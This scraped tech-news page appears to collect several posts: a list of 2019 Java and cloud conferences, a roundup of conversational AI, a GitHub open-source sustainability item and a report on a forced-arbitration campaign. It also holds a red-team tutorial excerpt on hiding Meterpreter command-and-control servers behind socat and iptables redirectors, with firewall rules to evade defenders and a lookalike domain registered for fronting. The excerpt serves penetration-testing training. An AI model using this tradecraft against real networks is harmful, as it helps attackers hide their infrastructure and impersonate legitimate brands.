JAX is a Java architecture and software innovation conference, held in Mainz, Germany, May 6-10 this year, with the expo running from May 7 to 9. Other than Java, topics like agile, cloud, Kubernetes, DevOps, microservices, and machine learning are also part of this event. They’re offering discounts on passes till February 14.

JBCNConf is happening in Barcelona, Spain from May 27. It will be a three-day conference with talks from notable Java champions. The focus of the conference is on Java, the JVM, and open-source technologies.

Jfokus is a developer-centric conference taking place in Stockholm, Sweden. It will be a three-day event from February 4-6. Speakers include the Java language architect Brian Goetz from Oracle and many other notable experts. The conference will cover Java, of course, as well as frontend and web, cloud and DevOps, IoT and AI, and future trends.

One of the biggest conferences is JavaZone, which attracts thousands of visitors and hundreds of speakers and will be 18 years old this year. It is usually held in Oslo, Norway, in September. Its website for 2019 is not active at the time of writing, but you can check out last year’s website.

Javaland will feature lectures, training, and community activities. Held in Bruehl, Germany from March 19 to 21, it also gives attendees the chance to exhibit.

If you’re working in or around Java this year, there’s clearly a lot to look forward to - as well as a few unanswered questions about the evolution of the language in the future.
While these changes might not impact the way you work in the immediate term, keeping on top of what’s happening and what key figures are saying will set you up nicely for the future.

Read Next

4 key findings from The State of JavaScript 2018 developer survey
Netflix adopts Spring Boot as its core Java framework
Java 11 is here with TLS 1.3, Unicode 11, and more updates

The 10 best cloud and infrastructure conferences happening in 2019

Sugandha Lahoti
23 Jan 2019
11 min read
The latest Gartner report suggests that the cloud market is going to grow an astonishing 17.3% to $206 billion in 2019, up from $175.8 billion in 2018. By 2022, the report claims, 90% of organizations will be using cloud services.

But the cloud isn’t one thing, and 2019 is likely to bring the diversity of solutions, from hybrid to multi-cloud to serverless, to the fore. With such a mix of opportunities and emerging trends, it’s going to be essential to keep a close eye on key cloud computing and software infrastructure conferences throughout the year. These are the events where we’ll hear the most important announcements, and they’ll probably also be where the most important conversations happen. But with so many cloud computing conferences dotted throughout the year, it’s hard to know where to focus your attention. For that very reason, we’ve put together a list of some of the best cloud computing conferences taking place in 2019.

#1 Google Cloud Next

When and where is Google Cloud Next 2019 happening? April 9-11 at the Moscone Center in San Francisco.

What is it? This is Google’s annual global conference focusing on the company’s cloud services and products, namely Google Cloud Platform. At previous events, Google has announced enterprise products such as G Suite and developer tools. The three-day conference features demonstrations, keynotes, announcements, conversations, and boot camps.

What’s happening at Google Cloud Next 2019? This year Google Cloud Next has more than 450 sessions scheduled. You can also meet directly with Google experts in artificial intelligence and machine learning, security, and software infrastructure. Themes covered this year include application development, architecture, collaboration and productivity, compute, cost management, DevOps and SRE, hybrid cloud, and serverless. The conference may also serve as a debut platform for new Google Cloud CEO Thomas Kurian.

Who’s it for?
The event is a must for IT professionals and engineers, but it will also likely attract entrepreneurs. For those of us who won’t attend, Google Cloud Next will certainly be one of the most important conferences to follow. Early bird registration begins from March 1 for $999.

#2 OpenStack Infrastructure Summit

When and where is OpenStack Infrastructure Summit 2019 happening? April 29 - May 1 in Denver.

What is it? The OpenStack Infrastructure Summit, previously the OpenStack Summit, is focused on open infrastructure integration and has evolved over the years to cover more than 30 different open source projects. The event is structured around use cases, training, and related open source projects. The summit also conducts the Project Teams Gathering just after the main conference (this year May 2-4). The PTG provides meeting facilities, allowing the various technical teams contributing to OSF (OpenStack Foundation) projects to meet in person, exchange ideas, and get work done in a productive setting.

What’s happening at this year’s OpenStack Infrastructure Summit? This year the summit is expected to have almost 300 sessions and workshops on container infrastructure, CI/CD, telecom and NFV, public cloud, private and hybrid cloud, security, and more. The summit is going to have members of open source communities like Airship, Ansible, Ceph, Docker, Kata Containers, Kubernetes, ONAP, OpenStack, Open vSwitch, OPNFV, StarlingX, and Zuul, among others.

Who’s it for? This is an event for engineers working in operations and administration. If you’re interested in OpenStack and how the foundation fits into the modern cloud landscape, there will certainly be something here for you.

#3 DockerCon

When and where is DockerCon 2019 happening? April 29 to May 2 at Moscone West, San Francisco.

What is it? DockerCon is perhaps the container event of the year.
The focus is on what’s happening across the Docker world, but it will offer plenty of opportunities to explore the ways Docker is interacting and evolving with a wider ecosystem of tools.

What’s happening at DockerCon 2019? This three-day conference will feature networking opportunities and hands-on labs. It will also hold an exposition where innovators will showcase their latest products. It’s expected to have over 6,000 attendees, with 5+ tracks and 100 sessions. You’ll also have the opportunity to become a Docker Certified Associate with an on-venue test.

Who’s it for? The event is essential for anyone working in and around containers - so DevOps, SRE, administration, and infrastructure engineers. Of course, with Docker finding its way into the toolsets of a variety of roles, it may be useful for people who want to understand how Docker might change the way they work in the future. Pricing for DockerCon runs from around $1080 for early-bird reservations to $1350 for standard tickets.

#4 Red Hat Summit

When and where is Red Hat Summit 2019 happening? May 7-9 in Boston.

What is it? Red Hat Summit is an open source technology event run by Red Hat. It covers a wide range of topics and issues, essentially providing a snapshot of where the open source world is at the moment and where it might be going. With open source shaping cloud and other related trends, it’s easy to see why the event could be important for anyone with an interest in cloud and infrastructure.

What’s happening at Red Hat Summit 2019? The theme for this year is AND. The copy on the event’s website reads: AND is about scaling your technology and culture in whatever size or direction you need, when you need to, with what you actually need―not a bunch of bulky add-ons. From the right foundation―an open foundation―AND adapts with you. It’s interoperable, adjustable, elastic. Think Linux AND Containers. Think public AND private cloud. Think Red Hat AND you.
There’s clearly an interesting conceptual proposition at the center of this year’s event that hints at how Red Hat wants to get engineers and technology buyers to think about the tools they use and how they use them.

Who’s it for? The event is big for any admin or engineer that works with open source technology - Linux in particular (so, quite a lot of people…). Given that Red Hat was bought by IBM just a few months ago in 2018, this event will certainly be worth watching for anyone interested in the evolution of both companies, as well as open source software more broadly.

#5 KubeCon + CloudNativeCon Europe

When and where is KubeCon + CloudNativeCon Europe 2019? May 20 to 23 at Fira Barcelona.

What is it? KubeCon + CloudNativeCon is the CNCF’s (Cloud Native Computing Foundation) flagship conference for the open source and cloud-native communities. It features contributors from cloud-native applications and computing, containers, microservices, central orchestration processing, and related projects, furthering education around the technologies that support the cloud-native ecosystem.

What’s happening at this year’s KubeCon? The conference will feature a range of events and sessions from industry experts, project leaders, and sponsors. The details of the conference are still being finalized, but the focus will be on projects such as Kubernetes (obviously), Prometheus, Linkerd, and CoreDNS.

Who’s it for? The conference is relevant to anyone with an interest in software infrastructure. It’s likely to be instructive and insightful for those working in SRE, DevOps, and administration, but because of Kubernetes’ importance in cloud-native practices, there will be something here for many others in the technology industry. The cost is unconfirmed, but it could be anywhere between $150 and $1,100.

#6 IEEE International Conference on Cloud Computing

When and where is the IEEE International Conference on Cloud Computing? July 8-13 in Milan.

What is it?
This is an IEEE conference solely dedicated to cloud computing. IEEE Cloud is basically for research practitioners to exchange their findings on the latest cloud computing advances. It includes findings across all “as a service” categories, including network, infrastructure, platform, software, and function.

What’s happening at the IEEE International Conference on Cloud Computing? IEEE Cloud 2019 invites original research papers addressing all aspects of cloud computing technology, systems, applications, and business innovations. These are mostly based on technical topics, including cloud as a service, cloud applications, cloud infrastructure, cloud computing architectures, cloud management, and operations. Shangguang Wang and Stephan Reiff-Marganiec have been appointed as congress workshop chairs. Featured keynote speakers for the 2019 World Congress on Services include Kathryn Guarini, VP at IBM Industry Research, and Joseph Sifakis, the Emeritus Senior CNRS Researcher at Verimag.

Who’s it for? The conference has a more academic bent than the others on this list. That means it’s particularly important for researchers in the field, but there will undoubtedly be lots here for industry practitioners who want to find new perspectives on the relationship between cloud computing and business.

#7 VMworld

When and where is VMworld 2019? August 25-29 in San Francisco.

What is it? VMworld is a virtualization and cloud computing conference hosted by VMware. It is the largest virtualization-specific event. VMware CEO Pat Gelsinger and the executive team typically provide updates on the company’s various business strategies, including multi-cloud management, VMware Cloud for AWS, end-user productivity, security, mobile, and other efforts.

What’s happening at VMworld 2019? The 5-day conference starts with general sessions on IT and business. It then goes deeper into breakout sessions, expert panels, and quick talks.
It also holds various VMware Hands-on Labs and VMware Certification opportunities, as well as one-on-one appointments with in-house experts. More than 21,000 attendees are expected. Who’s it for? VMworld maybe doesn’t have the glitz and glamor of an event like DockerCon or KubeCon, but it is a key event for administrators and technology decision makers with an interest in VMware’s products and services. #8 Microsoft Ignite When and where is Microsoft Ignite 2019? November 4-8 at Orlando, Florida What is it? Ignite is Microsoft's flagship enterprise event for everything cloud, data, business intelligence, teamwork, and productivity. What’s happening at Microsoft Ignite 2019? Microsoft Ignite 2019 is expected to feature almost 700 deep-dive sessions and more than 100 expert-led and self-paced workshops. The full agenda will be posted sometime in Spring 2019. You can pre-register for Ignite 2019 here. Microsoft will also be touring many cities around the world to bring the Ignite experience to more people. Who’s it for? The event should have wide appeal, and will likely reflect Microsoft’s efforts to bring a range of tech professionals into the ecosystem. Whether you’re a developer, infrastructure engineer, or operations manager, Ignite is, at the very least, an event you should pay attention to. #9 Dreamforce When and where is Dreamforce 2019? November 19-22, in San Francisco. What is it? Dreamforce, hosted by Salesforce, is a truly huge conference, attended by more than 100,000 people. Focusing on Salesforce and CRM, the event is an opportunity to learn from experts, share experiences and ideas, and to stay up to speed with trends in the field, like automation and artificial intelligence. What’s happening at Dreamforce 2019? Dreamforce covers over 25 keynotes, a vast range of breakout sessions (almost 2,700) and plenty of opportunities for networking. The conference is so extensive that it has its own app to help delegates manage their agenda and navigate venues. Who’s it for?
Dreamforce is primarily about Salesforce - for that reason, it’s very much an event for customers and users. But given the size of the event, it also offers a great deal of insight into how businesses are using SaaS products and what they expect from them. This means there is plenty for those working in more technical or product roles to learn at the event. #10 Amazon re:Invent When and where is Amazon re:Invent 2019? December 2-6 at The Venetian, Las Vegas, USA What is it? Amazon re:Invent is hosted by AWS. In case you’ve been living on Mars in recent years: AWS is the market leader when it comes to cloud. The event, then, is AWS’ opportunity to set the agenda for the cloud landscape, announcing updates and new features, as well as an opportunity to discuss the future of the platform. What’s happening at Amazon re:Invent 2019? Around 40,000 people typically attend Amazon’s top cloud event. Amazon Web Services and its cloud-focused partners typically reveal product releases on several fronts. Some of these include enterprise security, the Transit Virtual Private Cloud service, and general releases. This year, Amazon is also launching a related conference dedicated exclusively to cloud security called re:Inforce. The inaugural event will take place in Boston on June 25th and 26th, 2019 at the Boston Convention and Exhibition Center. Who’s it for? The conference attracts Amazon’s top customers, software distribution partners (ISVs) and public cloud MSPs. The event is essential for developers and engineers, administrators, architects, and decision makers. Given the importance of AWS in the broader technology ecosystem, this is an event that will be well worth tracking, wherever you are in the world. Did we miss an important cloud computing conference? Are you attending any of these this year? Let us know in the comments – we’d love to hear from you. Also, check this space for more detailed coverage of the conferences.
Cloud computing trends in 2019 Key trends in software development in 2019: cloud native and the shrinking stack Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity
Bhagyashree R
21 Jan 2019
5 min read

Conversational AI in 2018: An arms race of new products, acquisitions, and more

Conversational AI is one of the most interesting applications of artificial intelligence in recent years. While the trend isn’t yet ubiquitous in the way that recommendation systems are (perhaps unsurprisingly), it has been successfully productized by a number of tech giants, in the form of Google Home and Amazon Echo (which is ‘powered by’ Alexa). The conversational AI arms race Arguably, 2018 has seen a bit of an arms race in conversational AI. As well as Google and Amazon, the likes of IBM, Microsoft, and Apple have wanted a piece of the action. Here are some of the new conversational AI tools and products these companies introduced this year: Google Google worked towards enhancing its conversational interface development platform, Dialogflow. In July, at the Google Cloud Next event, it announced several improvements and new capabilities to Dialogflow, including Text to Speech via DeepMind's WaveNet and Dialogflow Phone Gateway for telephony integration. It also launched a new product called Contact Center AI that comes with Dialogflow Enterprise Edition and additional capabilities to assist live agents and perform analytics. Google Assistant became better at holding back-and-forth conversations with the help of Continued Conversation, which was unveiled at the Google I/O conference. The assistant became multilingual in August, which means users can speak to it in more than one language at a time, without having to adjust their language settings. Users can enable this multilingual functionality by selecting two of the supported languages. Following in the footsteps of Amazon, Google also launched its own smart display, named Google Home Hub, at the ‘Made by Google’ event held in October. Microsoft Microsoft in 2018 introduced and improved various bot-building tools for developers. In May, at the Build conference, Microsoft announced major updates to its conversational AI tools: Azure Bot Service, Microsoft Cognitive Services Language Understanding, and QnAMaker.
To enable intelligent bots to learn from example interactions and handle common small talk, it launched new experimental projects named Conversation Learner and Personality Chat. At Microsoft Ignite, Bot Framework SDK V4.0 was made generally available. Later, in November, Microsoft announced the general availability of the Bot Framework Emulator V4 and Web Chat control. In May, to drive more research and development in its conversational AI products, Microsoft acquired Semantic Machines and established a conversational AI center of excellence in Berkeley. In November, the organization's acquisition of Austin-based bot startup XOXCO was a clear indication that it wants to get serious about using artificial intelligence for conversational bots. Producing guidelines on developing ‘responsible’ conversational AI further confirmed Microsoft wants to play a big part in the future evolution of the area. Microsoft was chosen as the tech partner by UK-based conversational AI startup ICS.ai. The team at ICS is using Azure and LUIS from Microsoft in its public sector AI chatbots, aimed at higher education, healthcare trusts and county councils. Amazon Amazon, with the aim of improving Alexa’s capabilities, released the Alexa Skills Kit (ASK), which consists of APIs, tools, documentation, and code samples that developers can use to build new skills for Alexa. In September, it announced a preview of a new design language named Alexa Presentation Language (APL). With APL, developers can build visual skills that include graphics, images, slideshows, and video, and customize them for different device types. Amazon’s smart speaker, the Echo Dot, became the best seller in the smart speaker category on Amazon. At its 2018 hardware event in Seattle, Amazon announced the launch of a redesigned Echo Dot and a new addition to its Alexa-powered A/V line-up, the Echo Plus.
As well as the continuing success of Alexa and the Amazon Echo, Amazon’s decision to launch the Alexa Fellowship at a number of leading academic institutions also highlights that for the biggest companies conversational AI is as much about research and exploration as it is products. Like Microsoft, it appears that Amazon is well aware that conversational AI is an area only in its infancy, still in development - as much as great products, it requires clear thinking and cutting-edge insight to ensure that it develops in a way that is both safe and impactful. What’s next? This huge array of products is a result of advances in deep learning research. Conversational AI is no longer limited to small tasks like setting an alarm or searching for the best restaurant; we can now have a back-and-forth conversation with a conversational agent. But, needless to say, it still needs more work. Conversational agents are yet to meet user expectations related to sensing and responding with emotion. In the coming years, we will see these systems understand language better and do a good job of generating natural language. They will be able to have reasonably natural conversations with humans in certain domains, grounded in context. Also, the continuous development in IoT will provide AI systems with more context. Apple has introduced Shortcuts for iOS 12 to automate your everyday tasks Microsoft amplifies focus on conversational AI: Acquires XOXCO; shares guide to developing responsible bots Amazon is supporting research into conversational AI with Alexa fellowships
Sugandha Lahoti
18 Jan 2019
4 min read

Github wants to improve Open Source sustainability; invites maintainers to talk about their OSS challenges

Open Source Sustainability is an essential and special part of free and open software development. Open source contributors and maintainers build tools and technologies for everyone, but they don’t get enough resources, tools, and support. If anything goes wrong with a project, it is generally the maintainers who are held responsible for it. In reality, however, contributors and maintainers together share that responsibility. Yesterday, Devon Zuegel, the open source product manager at GitHub, penned a blog post about open source sustainability and the issues current open source maintainers face while trying to contribute to open source. The major thing holding back OSS is the work overload that maintainers face. The OSS community generally consists of maintainers who work at other organizations while maintaining their open source projects mostly in their free time. This leaves little room for software creators to gain economically from their projects and to cover the costs and people required to maintain them. This calls for companies and individuals to donate to these maintainers on GitHub. As a Hacker News user points out, “I think this would be a huge incentive for people to continue their work long-term and not just "hand over" repositories to people with ulterior motives.” Another said, “Integrating bug bounties and donations into GitHub could be one of the best things to happen to Open Source. Funding new features and bug fixes could become seamless, and it would sway more devs to adopt this model for their projects.” Another major challenge is the abuse and frustration that maintainers have to face on a daily basis. As Devon writes in her blog, “No one deserves abuse.
OSS contributors are often on the receiving end of harassment, demands, and general disrespect, even as they volunteer their time to the community.” What is required is to educate people and also to build some kind of moderation for trolls, such as a small barrier to entry. Apart from that, maintainers should also be given expanded visibility into how their software is used. Currently, they are only given access to download statistics. There should be a proper governance model that is regularly updated based on the decisions the team makes, delegates, and communicates. As Adam Jacob, founder of SFOSC (Sustainable Free and Open Source Communities), points out, “I believe we need to start talking about Open Source, not in terms of licensing models, or business models (though those things matter): instead, we should be talking about whether or not we are building sustainable communities. What brings us together, as people, in this common effort around the software? What rights do we hold true for each other? What rights are we willing to trade in order to see more of the software in the world, through the investment of capital?” SFOSC was established to discuss the principles that lead to sustainable communities, to develop clear social contracts communities can use, and to educate Open Source companies on which business models can create true communities. Like SFOSC, GitHub wants to better understand the woes of maintainers from their own experiences, hence the blog post. Devon wants to support the people behind OSS at GitHub, inviting people to have an open dialogue with the GitHub community to solve the nuanced and unique challenges that the current OSS community faces. She has created a contact form asking open source contributors and maintainers to join the conversation and share their problems. Open Source Software: Are maintainers the only ones responsible for software sustainability?
We need to encourage the meta-conversation around open source, says Nadia Eghbal [Interview] EU to sponsor bug bounty programs for 14 open source projects from January 2019
Natasha Mathur
17 Jan 2019
6 min read

Googlers launch industry-wide awareness campaign to fight against forced arbitration

A group of Googlers launched a public awareness social media campaign from 9 AM to 6 PM EST yesterday. The group, called ‘Googlers for ending forced arbitration’, shared information about arbitration on their Twitter and Instagram accounts throughout the day. https://twitter.com/endforcedarb/status/1084813222505410560 The group tweeted out yesterday, as part of the campaign, that in surveying employees of 30+ tech companies and 10+ common temp/contractor suppliers in the industry, none of them could meet the three primary criteria needed for a transparent workplace. The three basic criteria include: an optional arbitration policy for all employees and for all forms of discrimination (including contractors/temps), no class action waivers, and no gag rule that keeps arbitration proceedings confidential. The group shared some hard facts about arbitration and also busted myths regarding the same. Let’s have a look at some of the key highlights from yesterday’s campaign. At least 60 million Americans are forced to use arbitration The group states that the implementation of forced arbitration policies has grown significantly in the past seven years. Over 65% of companies with 1,000 or more employees now have mandatory arbitration procedures. Employees don’t have an option to take their employers to court in cases of harassment or discrimination. People of colour and women are often the ones affected the most by this practice. How employers use forced arbitration Forced arbitration is extremely unfair Arbitration firms that are hired by the companies almost always favour the companies over their employees, due to the fear of being rejected the next time by an employer should the arbitration firm decide to favour the employee. The group states that employees are 1.7 times more likely to win in federal courts and 2.6 times more likely to win in state courts than in arbitration.
There are no public filings of the complaint details, meaning that the company won’t have anyone to answer to regarding the issues within the organization. The company can also limit its obligation when it comes to disclosing the evidence that you need to prove your case. Arbitration hearings happen behind closed doors within a company When it comes to arbitration hearings, it's just an employee and their lawyer, the other party and their lawyer, along with a panel of one to three arbitrators. Each party gets to pick one arbitrator, who is ultimately hired by the employer. However, there’s usually only a single-arbitrator panel involved, as a three-arbitrator panel costs five times more than a single-arbitrator one, as per the American Arbitration Association. Forced arbitration requires employees to sign away their right to class action lawsuits at the start of employment The group states that, irrespective of whether legal disputes exist or not, forced arbitration bans employees from coming together as a group, in arbitration as well as in class action lawsuits. Most employers also practice a “gag rule” which restricts employees from even talking about their experience with the arbitration policy. There are certain companies that do give you an option to opt out of forced arbitration using an opt-out form, but this comes with a time constraint depending on your agreement with that company. For instance, companies such as Twitter, Facebook, and Adecco give their employees a chance to opt out of forced arbitration. Arbitration opt-out option JAMS and AAA are among the top arbitration organizations used by major tech giants JAMS, Judicial Arbitration and Mediation Services, is a private company that is used by employers like Google, Airbnb, Uber, Tesla, and VMware. JAMS does not publicly disclose the diversity of its arbitrators.
Similarly, AAA, the American Arbitration Association, is a non-profit organization where usually retired judges or lawyers serve as arbitrators. Arbitrators in AAA have an overall composition of 24% women and minorities. AAA is one of the largest arbitration organizations, used by companies such as Facebook, Lyft, Oracle, Samsung, and Two Sigma. Katherine Stone, a professor from UCLA law school, states that the procedures followed by these arbitration firms don’t allow much discovery. What this means is that these firms don’t usually permit depositions or various kinds of document exchange before the hearing. “So, the worker goes into the hearing...armed with nothing, other than their own individual grievances, their own individual complaints, and their own individual experience. They can’t learn about the experience of others,” says Stone. Female workers and African-American workers are most likely to suffer from forced arbitration 58% of female workers and 59% of African American workers face mandatory arbitration, depending on the workgroup. For instance, in the construction industry, which is highly male-dominated, the imposition of forced arbitration is at its lowest rate. But in the education and health industries, which have a majority-female workforce, the imposition rate of forced arbitration is high. Forced arbitration rate among different workgroups The Supreme Court has gradually allowed companies to expand arbitration to employees & consumers The group states that the 1925 Federal Arbitration Act (FAA) legalized arbitration between shipping companies for settling commercial disputes. The Supreme Court, however, gradually expanded this practice of arbitration to employees and consumers too. Supreme Court decisions Apart from sharing these facts, the group also shed insight on the dos and don’ts that employees should follow under forced arbitration clauses.
Dos and Don’ts The social media campaign by Googlers against forced arbitration represents an upsurge in strength and courage among employees within the tech industry, as not just Google employees but also employees from other tech companies shared their experiences regarding forced arbitration. The group had researched academic institutions, labour attorneys, advocacy groups, etc., and the contracts of around 30 major tech companies, as a part of the campaign. To follow all the highlights from the campaign, follow the End Forced Arbitration Twitter account. Shareholders sue Alphabet’s board members for protecting senior execs accused of sexual harassment Recode Decode #GoogleWalkout interview shows why data and evidence don’t always lead to right decisions in even the world’s most data-driven company Tech Workers Coalition volunteers talk unionization and solidarity in Silicon Valley
Amrata Joshi
16 Jan 2019
11 min read

Obfuscating Command and Control (C2) servers securely with Redirectors [Tutorial]

A redirector server is responsible for redirecting all communication to the C2 server. Let's explore the basics of redirectors using a simple example. Take a scenario in which we have already configured our team server and we're waiting for an incoming Meterpreter connection on port 8080/tcp. Here, the payload is delivered to the target and has been executed successfully. This article is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book covers advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of redirectors, the process of obfuscating C2 securely, domain fronting and much more. Here is what will happen next: On payload execution, the target server will try to connect to our C2 on port 8080/tcp. Upon successful connection, our C2 will send the second stage as follows: A Meterpreter session will then open and we can access this using Armitage: However, the target server's connection table will have our C2's IP in it. This means that the monitoring team can easily get our C2 IP and block it: Here's the current situation. This is displayed in an architectural format in order to aid understanding: To protect our C2 from being burned, we need to add a redirector in front of our C2. Refer to the following image for a clear understanding of this process: This is currently the IP information of our redirector and C2: Redirector IP: 35.153.183.204 C2 IP: 54.166.109.171 Assuming that socat is installed on the redirector server, we will execute the following command (typically something along the lines of socat TCP4-LISTEN:8080,fork TCP4:54.166.109.171:8080) to forward all communications arriving on port 8080/tcp to our C2: Our redirector is now ready. Now let's generate a one-liner payload with a small change.
This time, the lhost will be set to the redirector IP instead of the C2: Upon execution of the payload, the connection will initiate from the target server and the server will try to connect with the redirector: We will now notice something different in the following image, as the source IP seen by the C2 is the redirector instead of the target server: Let's take a look at the connection table of the target server: The connection table doesn't have our C2 IP, and neither does the Blue team. Now that the redirector is working perfectly, what could be the issue with this C2-redirector setup? Let's perform a port scan on the C2 to check the available open ports: As we can see from the preceding screenshot, port 8080/tcp is open on our C2. This means that anyone can try to connect to our listener in order to confirm its existence. To avoid situations like this, we should configure our C2 in a way that protects it from outside reconnaissance (recon) and attacks. Obfuscating C2 securely To put it in a diagrammatic format, our current C2 configuration is this: If someone tries to connect to our C2 server, they will be able to detect that our C2 server is running a Meterpreter handler on port 8080/tcp: To protect our C2 server from outside scanning and recon, let's set the following Uncomplicated Firewall (UFW) ruleset so that only our redirector can connect to our C2.
To begin, execute the following UFW commands to add firewall rules for the C2: sudo ufw allow 22 sudo ufw allow 55553 sudo ufw allow from 35.153.183.204 to any port 8080 proto tcp sudo ufw allow out to 35.153.183.204 port 8080 proto tcp sudo ufw deny out to any The commands and their result are shown in the following screenshot: In addition, execute the following ufw commands to add firewall rules for the redirector as well: sudo ufw allow 22 sudo ufw allow 8080 The commands and their result are shown in the following screenshot: Once the ruleset is in place, this can be described as follows: If we try to perform a port scan on the C2 now, the ports will be shown as filtered, as shown below. Furthermore, our C2 is only accessible from our redirector now. Let's also confirm this by doing a port scan on our C2 from the redirector server: Short-term and long-term redirectors Short-term (ST), also called short-haul, C2 servers are those on which the beaconing process will continue. Whenever a system in the targeted organization executes our payload, the server will connect with the ST-C2 server. The payload will periodically poll for tasks from our C2 server, meaning that the target will call back to the ST-C2 server every few seconds. The redirector placed in front of our ST-C2 server is called the short-term (ST) redirector. This is responsible for handling ST-C2 server connections, over which the ST-C2 will be used for executing commands on the target server in real time. ST and LT redirectors can get caught easily during the course of an engagement because they're placed at the front. A long-term (LT), also known as long-haul, C2 server is one where the callbacks from the target server arrive only every few hours or days. The redirector placed in front of our LT-C2 server is called a long-term (LT) redirector. This redirector is used to maintain access for a longer period of time than ST redirectors.
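The difference between short-haul and long-haul C2 comes down to the callback interval. As a minimal sketch of how an implant might schedule its callbacks (the base intervals and the jitter factor here are illustrative assumptions, not values from the book):

```python
import random

# Assumed illustrative intervals: a short-haul beacon polls every few
# seconds, while a long-haul beacon calls back only every few hours.
SHORT_HAUL_BASE = 5            # seconds
LONG_HAUL_BASE = 6 * 60 * 60   # seconds (6 hours)

def next_callback_delay(base_seconds, jitter=0.2):
    """Return the delay before the next callback, randomized by
    +/- jitter so the beacon doesn't produce a fixed, easily
    fingerprinted period on the wire."""
    return random.uniform(base_seconds * (1 - jitter),
                          base_seconds * (1 + jitter))
```

With these numbers, a short-haul delay always falls between 4 and 6 seconds, while a long-haul delay falls between roughly 4.8 and 7.2 hours.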
When performing persistence via the ST-C2 server, we need to provide the domain of our LT redirector so that the persistence module running on the target server will connect back to the LT redirector instead of the ST redirector. A segregated red team infrastructure setup would look something like this: Source: https://payatu.com/wp-content/uploads/2018/08/redteam_infra.png Once we have a proper red team infrastructure setup, we can focus on the kind of redirection we want to have in our ST and LT redirectors. Redirection methods There are two ways in which we can perform redirection: Dumb pipe redirection Filtration/smart redirection Dumb pipe redirection A dumb pipe redirector blindly forwards the network traffic from the target server to our C2, or vice-versa. This type of redirector is useful for quick configuration and setup, but it lacks a level of control over the incoming traffic. Dumb pipe redirection will obfuscate (hide) the real IP of our C2, but it won't distract the organization's defenders from investigating our setup. We can perform dumb pipe redirection using socat or iptables. In both cases, the network traffic will be redirected either to our ST-C2 server or our LT-C2 server. Source: https://payatu.com/wp-content/uploads/2018/08/dumb_pipe_redirection123.png Let's execute the command given in the following image in order to configure a dumb pipe redirector that redirects to our C2 on port 8080/tcp: Following are the commands that we can execute to perform dumb pipe redirection using iptables: iptables -I INPUT -p tcp -m tcp --dport 8080 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 54.166.109.171:8080 iptables -t nat -A POSTROUTING -j MASQUERADE iptables -I FORWARD -j ACCEPT iptables -P FORWARD ACCEPT sysctl net.ipv4.ip_forward=1 The commands and their result are shown in the following screenshot: (Ignore the sudo error here.
This has occurred because of the hostname that we changed.) Using socat or iptables, the result would be the same, i.e., the network traffic on the redirector's interface will be forwarded to our C2. Filtration/smart redirection Filtration redirection, also known as smart redirection, doesn't just blindly forward the network traffic to the C2. Smart redirection will always process the network traffic based on the rules defined by the red team before forwarding it to the C2. With smart redirection, if the traffic is not valid C2 traffic, it will either be forwarded to a legitimate website or the packets will simply be dropped. Only if the network traffic is for our C2 will the redirection work accordingly: To configure smart redirection, we need to install and configure a web server. Let's install the Apache server on the redirector using the sudo apt install apache2 command: We need to execute the following commands as well in order to enable Apache's rewrite, proxy, and SSL modules: sudo apt-get install apache2 sudo a2enmod ssl rewrite proxy proxy_http sudo a2ensite default-ssl.conf sudo service apache2 restart The result of the executed commands is shown in the following screenshot: We also need to adjust Apache's configuration: We need to look for the Directory directive in order to change AllowOverride from None to All so that we can use our custom .htaccess file for web request filtration. We can now set up the virtual host settings for wwwpacktpub.tk (/etc/apache2/sites-enabled/default-ssl.conf): After this, we can generate the payload with a domain such as wwwpacktpub.tk in order to get a connection.
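The filtration decision at the heart of smart redirection can be sketched as follows. This is only an illustration of the idea, not the book's actual ruleset: the expected User-Agent value and the decoy site below are assumptions, and in practice the rule would live in the Apache .htaccess rewrite conditions rather than in application code:

```python
# Hypothetical rule: only requests carrying the User-Agent string our
# payload is configured to send get proxied to the C2; everything else
# (scanners, sandboxes, curious analysts) is sent to a decoy website.
EXPECTED_UA = "Mozilla/5.0 (compatible; beacon/1.0)"   # assumed value
C2_BACKEND = "http://54.166.109.171:8080"              # the C2 from this example
DECOY_SITE = "https://www.example.com"                 # assumed decoy

def route(headers):
    """Decide where an incoming request should be forwarded."""
    if headers.get("User-Agent") == EXPECTED_UA:
        return C2_BACKEND
    return DECOY_SITE
```

A request carrying the expected User-Agent is routed to the C2 backend; any other request, such as a port scanner's probe, only ever sees the decoy.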
Domain fronting According to https://resources.infosecinstitute.com/domain-fronting/: Domain fronting is a technique that is designed to circumvent the censorship employed for certain domains (censorship may occur for domains that are not in line with a company's policies, or they may be a result of the bad reputation of a domain). Domain fronting works at the HTTPS layer and uses different domain names at different layers of the request (more on this later). To the censors, it looks like the communication is happening between the client and a permitted domain. However, in reality, communication might be happening between the client and a blocked domain. To make a start with domain fronting, we need to get a domain that is similar to our target organization's. To check for domains, we can use the domainhunter tool. Let's clone the repository to continue: We need to install some required Python packages before continuing further. This can be achieved by executing the pip install -r requirements.txt command as follows: After installation, we can run the tool by executing the python domainhunter.py command as follows: By default, this will fetch expired and deleted domains without filtering by name, because we didn't provide one: Let's check the help option to see how we can use domainhunter: Let's search for a keyword to look for domains related to the specified keyword. In this case, we will use packtpub as the desired keyword: We just found out that wwwpacktpub.com is available. Let's confirm its availability at domain searching websites as follows: This confirms that the domain is available on name.com and even on dot.tk for almost $8.50: Let's see if we can find a free domain with a different TLD: We have found that the previously mentioned domains are free to register.
Let's select wwwpacktpub.tk as follows: We can again check the availability of wwwpacktpub.tk and obtain this domain for free: In the preceding setting, we need to set our redirector's IP address in the Use DNS field: Let's review the purchase and then check out: Our order has now been confirmed. We have just obtained wwwpacktpub.tk: Let's execute the dig command to confirm our ownership of it: The dig command resolves wwwpacktpub.tk to our redirector's IP. Now that we own the domain, we can set it when creating the stager and get the back connection from wwwpacktpub.tk: In this article, we learned the basics of redirectors and covered how to obfuscate C2s in a secure manner so that we can protect them from being detected by the blue team. This article also covered short-term and long-term C2s, and much more. To learn more about advanced penetration testing tools, check out the book Hands-On Red Team Tactics, written by Himanshu Sharma and Harpreet Singh.
Melisha Dsouza
15 Jan 2019
12 min read

Implementing Azure-Managed Kubernetes and Azure Container Service [Tutorial]

